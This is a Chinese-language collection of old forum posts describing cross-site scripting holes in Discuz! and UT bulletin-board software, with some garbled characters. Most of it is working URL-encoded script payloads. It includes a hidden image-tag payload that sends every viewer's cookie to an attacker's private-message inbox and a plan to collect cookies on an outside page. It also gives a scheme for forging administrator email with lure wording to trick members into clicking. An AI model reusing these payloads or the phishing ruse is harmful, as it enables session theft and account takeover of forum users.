在discuz！的發(fā)貼、回貼、PM等中的subject都沒有經(jīng)過過濾，所以也可以添加代碼。
例如
http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22

效果是首先彈出自己的cookie
利用方法：把上述代碼放置到img中。

適用版本：discuz！2.x
discuz！3.x
一種利用discuz！2.0漏洞進行欺騙獲得cookie的嘗試

通過測試XXXFan論壇的PM功能存在一個安全漏洞，具體描述如下：
XXXFan的給某個會員發(fā)送悄悄的鏈接如下（假定這個會員名字為XXXFan）
http://XXX/pm.php?action=send&username=XXXFan

因為論壇程序?qū)�會員名字沒有進行過濾，而是直接顯示在發(fā)送到欄目中（TO：），所以可以在名字后面加上script代碼。例如

http://XXX/pm.php?action=send&username=XXXFan ";><script>alert(document．.cookie)</script><b%20"

上面的鏈接點擊以后首先彈出的是自己的cookie內(nèi)容。
當然我們可以先在自己的站點上構(gòu)造一個程序來收集cookie，類似于
getcookie.php?cookie=

但是如何來誘使會員點擊呢，如果簡單的放在論壇上，太容易被識別。所以可以利用discuz論壇程序的另外一個功能，“帖子介紹給朋友”功能。

因為discuz的這個功能對填寫的emial地址沒有進行任何過濾、辨別和模版，可以偽造任何人給別人發(fā)信，安全性很高。利用這個功能我們就可以偽造ExploitFan的管理員給某個會員發(fā)一封信，誘使會員點擊我們準備的URL，如果誘使就看自己的手段了，例如可以說“論壇正在測試新功能，請您協(xié)助點擊上面地址，我們會在后臺記錄您的點擊在合適的時間會給您增加積分以做獎勵”等等。

因為鏈接地址是XXXFan的，而且發(fā)信人和郵件地址都是XXXFan的官方地址，所以可信度非常高，而且不會留下任何把柄。當然為了更高的安全性，可以在<script>里的內(nèi)容加密，以進一步增加隱蔽性。

至于得到cookie如何做，可以嘗試cookie欺騙或者是暴力破解MD5密碼

本方法適用于大部分使用discuz2.0的論壇,至于discuz3.0的利用方法請參與在我以前發(fā)表的discuz！悄悄話漏洞
【BUG】Discuz!投票的BUG
投票可以用
misc.php?action=votepoll&fid=2&tid=16980&pollanswers[]=n
（n為選項，從0開始）
的方式通過URL來直接投票

但是如果n>最大選項呢，嘻嘻～
照樣提交成功，不過增加了一個標題為空的選項

效果見：
http://discuz.net/viewthread.php?tid=20020&sid=dymPEc
（那個最后的空白的是我剛加的）

該漏洞存在的版本：
Discuz!3.X
Discuz!2.X(可能，沒有測試過）
Discuz!的代碼漏洞
這是接著昨天發(fā)現(xiàn)的漏洞所展開的，第一發(fā)現(xiàn)者（PK0909)。

具體的描述就不說了，下面是一個簡單的測試代碼。

http://www.xxxx.net/phpbbs/post.php?action...%3C%2Fscript%3E

上面的代碼是顯示出自己的cookie

下面是在某個比較有名的論壇的測試代碼，無論誰察看該網(wǎng)頁都會把cookie送到指定的會員短信箱里，隱蔽性很好，就是如果有人引用你的貼，哈哈～這里都會跑出來，露餡了

[ img]http://xxx.com/xx.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22MSXML2.XMLHTTP%22);Req.open(%22post%22,%22http://www.XXXX.com/forum/pm.php?action=send%22,false);var%20forms=%22pmSubmit=Submit%22.toLowerCase()%2B%22%26msgto=XXXXX%26subject=cookie%26saveoutbox=0%26message=%22%2Bescape(document．.cookie);Req.setRequestHeader(%22Content-length%22,forms.length)%3BReq.setRequestHeader(%22CONTENT-TYPE%22,%22application/x-www-form-urlencoded%22);Req.send(forms);%3c/script%3e%3cb%22 [ /img]
發(fā)現(xiàn)discuz！UT 跨域站點的腳本漏洞－－短消息篇有關(guān)跨域站點的腳本漏洞，已經(jīng)算是非常平成并普遍的漏洞了。
有關(guān)具體的消息可以參閱：
http://www.cert.org/advisories/CA-2000-02.html
下面針對Discuz、UT論壇程序的悄悄話部分加以說明

漏洞適應版本：
Discuz1.X
Discuz!2.0(0609,0820版)
Discuz!3.X
UT 1.0

漏洞描述：

discuz！給指定會員發(fā)送悄悄話使用的是類似http://www.XXXX.net/phpbbs/pm.php?action=send&username=name 的語句，但是name沒有經(jīng)過過濾直接顯示在發(fā)送短消息的頁面中，這就給偷cookie或者更嚴重的破壞打開了方便之門。

Discuz!3.X已經(jīng)改為http://XXX.net/pm.php?action=send&uid=XXXX類似的語句，避免了這個漏洞，但是在選擇短信文件夾的時候卻沒有經(jīng)過過濾。同樣產(chǎn)生了上面的漏洞


例
http://www.XXXX.net/phpbbs/pm.php?action=s...d&username=name %22%3E%3Cscript%3Ealert(document．.cookie)%3C/script%3E%3Cb%22[/url]
，上面的例子是顯示自己的cookie。（針對Discuz!1.X Discuz!2.X)

http://XXX.net/pm.php?folder=inbox%22%3E%3...cript%3E%3Cb%22
顯示自己的cookie。（針對Discuz!3.X)

UT雖然在主題上經(jīng)過了過濾，也就是說把%27轉(zhuǎn)換為'；但是其收件人卻沒有過濾，所以同樣有類似的漏洞。例子略。(在不同的UT論壇上發(fā)現(xiàn)其代碼不盡相同，但是總的來說都有類似的漏洞）


危害度：中弱

預防辦法：
點擊超級鏈接時請注意其真實內(nèi)容。更多的安全補丁請密切關(guān)注官方論壇。